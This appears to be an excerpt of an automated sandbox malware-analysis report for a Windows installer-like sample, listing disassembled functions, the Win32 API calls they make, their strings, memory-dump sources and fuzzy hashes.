                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu
                                                                                                      • String ID:
                                                                                                      • API String ID: 3711407533-0
                                                                                                      • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                      • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                      • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                      • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 601730667-0
                                                                                                      • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                      • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                      • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                      • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042311E
                                                                                                      • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceEnumFontsRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2698912916-0
                                                                                                      • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                      • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                      • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                      • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                      Strings
                                                                                                      • NumRecs range exceeded, xrefs: 0045C396
                                                                                                      • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$BuffersFlush
                                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                      • API String ID: 3593489403-659731555
                                                                                                      • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                      • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                      • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                      • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 296031713-1195792818
                                                                                                      • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                      • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                      • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                      • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                        • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                        • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                        • Part of subcall function 004063C4: 6FB81CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                        • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                        • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                        • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                        • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                        • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                        • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                        • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                        • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                        • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                        • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                        • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                        • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                        • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                        • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                        • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                        • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                        • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                        • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                        • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                        • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                        • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                        • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                      • String ID: Setup
                                                                                                      • API String ID: 504348408-3839654196
                                                                                                      • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                      • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                      • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                      • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: $=H
                                                                                                      • API String ID: 3660427363-3538597426
                                                                                                      • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                      • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                      • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                      • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                      • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                      • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                      • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                        • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                        • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                        • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                        • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                        • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                      • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                      • API String ID: 3869789854-2936008475
                                                                                                      • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                      • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                      • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                      • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                      • API String ID: 3535843008-1113070880
                                                                                                      • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                      • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                      • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                      • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CreateFile
                                                                                                      • API String ID: 2528220319-823142352
                                                                                                      • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                      • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                      • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                      • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                      • API String ID: 71445658-2565060666
                                                                                                      • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                      • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                      • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                      • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                      APIs
                                                                                                        • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorInitializeLibraryLoadModeProc
